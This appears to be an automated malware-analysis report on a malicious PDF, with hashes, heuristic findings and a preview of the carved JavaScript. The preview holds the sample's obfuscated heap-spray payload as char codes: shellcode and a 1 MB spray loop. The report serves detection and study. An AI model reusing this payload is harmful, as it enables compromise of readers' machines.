PDF malware analysis — malicious · b6ffd16842cb4962

MALICIOUS

PDF

2.4 KB First seen: 2026-05-08

MD5: 5be08ed06ee44a0b999c6936405ddabc SHA-1: 7f59967d424f5c500a36125699ffdb8de800fb04 SHA-256: b6ffd16842cb4962f3c629afa3753548441696a24d62d7ba393b77fb52d8dab7

116 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded and obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The String.fromCharCode heuristic suggests the JavaScript is further obfuscated. The extracted artifact 'javascript_obj0005_000.js' is also flagged for script obfuscation. The likely intent of this script is to download and execute a second-stage payload, although the exact mechanism cannot be determined due to obfuscation.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0005_000.js`	pdf-javascript-stream	PDF /JS object 5 at offset 0x107	7452 bytes
SHA-256: `28daf9da9b450eedb19e2a8838cb1b5b8c0c7f2925fcd2b8c0497515850812c8`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script sourceCode = "10,118,97,114,32,66,81,101,101,79,116,116,113,86,106,115,72,114,117,119,79,73,87,83,113,65,104,74,86,97,102,66,79,74,118,87,118,87,85,67,88,115,105,75,101,118,108,82,78,120,106,79,107,101,117,112,110,109,80,79,115,108,67,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,100,56,98,98,37,117,56,100,51,48,37,117,51,49,51,98,37,117,98,49,99,57,37,117,100,97,53,102,37,117,100,57,99,56,37,117,50,52,55,52,37,117,53,102,102,52,37,117,53,102,51,49,37,117,56,51,48,101,37,117,102,99,101,102,37,117,56,55,48,51,37,117,54,102,51,97,37,117,100,99,99,101,37,117,51,53,50,98,37,117,49,49,55,98,37,117,97,102,56,53,37,117,54,57,99,50,37,117,98,48,49,52,37,117,57,98,48,49,37,117,53,50,56,102,37,117,55,48,57,51,37,117,55,97,97,97,37,117,55,57,56,102,37,117,56,53,52,97,37,117,99,57,50,48,37,117,101,51,50,99,37,117,49,50,53,56,37,117,50,99,98,51,37,117,48,100,102,50,37,117,100,52,100,53,37,117,102,52,49,54,37,117,102,52,55,51,37,117,56,51,102,102,37,117,101,98,52,56,37,117,49,97,50,54,37,117,52,97,97,50,37,117,102,54,99,98,37,117,53,101,54,54,37,117,56,49,48,54,37,117,99,53,56,56,37,117,57,102,98,50,37,117,52,51,97,100,37,117,102,100,100,56,37,117,54,51,50,51,37,117,97,98,53,48,37,117,52,52,51,48,37,117,54,51,97,53,37,117,102,99,97,97,37,117,49,49,97,48,37,117,54,98,100,57,37,117,52,50,50,54,37,117,48,49,49,100,37,117,56,49,102,55,37,117,49,54,48,102,37,117,52,51,99,49,37,117,48,97,54,101,37,117,48,56,49,50,37,117,102,52,102,101,37,117,50,57,54,100,37,117,97,48,101,99,37,117,54,97,54,51,37,117,100,51,97,99,37,117,100,99,100,101,37,117,55,57,98,55,37,117,55,54,56,54,37,117,56,49,49,55,37,117,49,55,50,53,37,117,97,50,56,97,37,117,56,100,99,102,37,117,48,52,102,49,37,117,50,97,97,56,37,117,101,100,57,102,37,117,100,53,53,97,37,117,53,55,51,97,37,117,56,54,52,57,37,117,48,54,50,56,37,117,49,55,55,55,37,117,99,52,100,97,37,117,53,52,99,101,37,117,50,56,55,57,37,117,53,51,97,49,37,117,51,48,49,98,37,117,55,57,100,98,37,117,100,55,52,51,37,117,98,50,49,55,37,117,49,57,49,100,37,117,56,102,99,50,37,117,101,52,102,48,37,117,57,55,102,101,37,117,57,55,51,53,37,117,51,101,97,52,37,117,99,49,50,99,37,117,49,102,98,102,37,117,51,100,99,53,37,117,56,54,54,48,37,117,100,56,55,101,37,117,100,98,55,51,37,117,55,52,57,57,37,117,100,99,57,50,37,117,102,102,56,48,37,117,102,48,49,99,37,117,48,99,102,49,37,117,51,101,101,55,37,117,51,99,57,102,37,117,101,48,54,100,37,117,53,98,102,100,37,117,101,52,52,98,37,117,97,55,52,57,37,117,99,57,48,97,37,117,99,53,50,99,37,117,48,100,53,50,37,117,54,102,99,57,37,117,98,52,51,101,37,117,52,54,50,51,37,117,56,57,102,53,37,117,51,102,55,100,37,117,55,48,99,52,37,117,56,53,54,99,37,117,98,48,49,49,37,117,99,98,102,54,37,117,56,100,99,98,37,117,49,100,57,49,37,117,97,55,54,54,37,117,57,55,48,55,37,117,101,101,54,53,37,117,98,55,53,98,37,117,100,98,53,100,37,117,102,50,54,98,37,117,57,48,51,56,37,117,99,51,98,48,37,117,53,100,102,55,37,117,54,101,52,48,37,117,102,98,97,101,37,117,100,49,100,102,37,117,57,100,51,55,37,117,102,48,55,57,37,117,56,99,52,52,37,117,101,55,52,102,37,117,98,52,52,51,37,117,48,53,56,56,37,117,97,51,53,54,37,117,49,99,100,53,37,117,97,97,52,51,37,117,49,100,102,56,37,117,48,54,55,57,37,117,51,52,101,52,37,117,54,97,54,102,37,117,49,53,49,49,37,117,55,57,56,48,37,117,53,99,50,54,37,117,56,98,56,99,37,117,52,49,51,99,37,117,101,97,57,55,37,117,55,50,48,100,37,117,100,48,100,102,37,117,56,102,55,51,37,117,55,49,100,97,37,117,57,49,97,102,37,117,54,99,101,98,37,117,97,51,57,100,37,117,57,50,101,55,37,117,98,57,101,54,37,117,98,102,54,49,37,117,98,97,101,49,37,117,101,97,54,102,37,117,99,48,102,101,37,117,101,99,55,98,37,117,100,54,49,52,37,117,57,53,97,52,37,117,102,99,48,55,37,117,53,49,97,48,37,117,102,52,50,49,37,117,53,53,100,50,37,117,50,101,48,53,37,117,57,51,51,57,37,117,50,54,55,52,37,117,97,100,51,55,37,117,51,52,55,49,37,117,97,55,55,53,37,117,51,55,53,100,37,117,98,98,55,51,37,117,50,49,98,97,37,117,51,55,49,52,37,117,50,50,52,102,37,117,57,56,100,102,37,117,98,53,56,48,37,117,57,49,54,56,37,117,53,101,102,48,37,117,50,57,102,54,37,117,99,101,54,53,37,117,98,52,57,53,37,117,55,51,53,98,37,117,53,98,48,57,37,117,51,53,56,98,37,117,102,53,57,57,37,117,100,48,57,55,37,117,57,99,53,51,37,117,53,55,55,52,37,117,51,98,98,97,37,117,102,50,48,51,37,117,52,49,52,50,34,41,59,10,118,97,114,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,50,52,54,37,117,51,55,50,102,34,41,59,10,10,119,104,105,108,101,32,40,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,46,108,101,110,103,116,104,32,60,32,49,48,52,56,53,52,52,41,10,32,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,43,61,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,59,10,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,61,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,46,115,117,98,115,116,114,105,110,103,40,48,44,32,49,48,52,56,53,52,52,32,45,32,66,81,101,101,79,116,116,113,86,106,115,72,114,117,119,79,73,87,83,113,65,104,74,86,97,102,66,79,74,118,87,118,87,85,67,88,115,105,75,101,118,108,82,78,120,106,79,107,101,117,112,110,109,80,79,115,108,67,46,108,101,110,103,116,104,41,59,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,102,111,114,40,105,32,61,32,48,59,32,105,32,60,32,49,50,56,59,32,105,43,43,41,10,123,10,9,109,101,109,111,114,121,91,105,93,61,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,43,32,66,81,101,101,79,116,116,113,86,106,115,72,114,117,119,79,73,87,83,113,65,104,74,86,97,102,66,79,74,118,87,118,87,85,67,88,115,105,75,101,118,108,82,78,120,106,79,107,101,117,112,110,109,80,79,115,108,67,59,10,125,10"; function decrypt(str, jump){ var result = ""; var list = str.split(','); for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } return result; }

Open this report in the interactive analyzer, or submit your own file for analysis.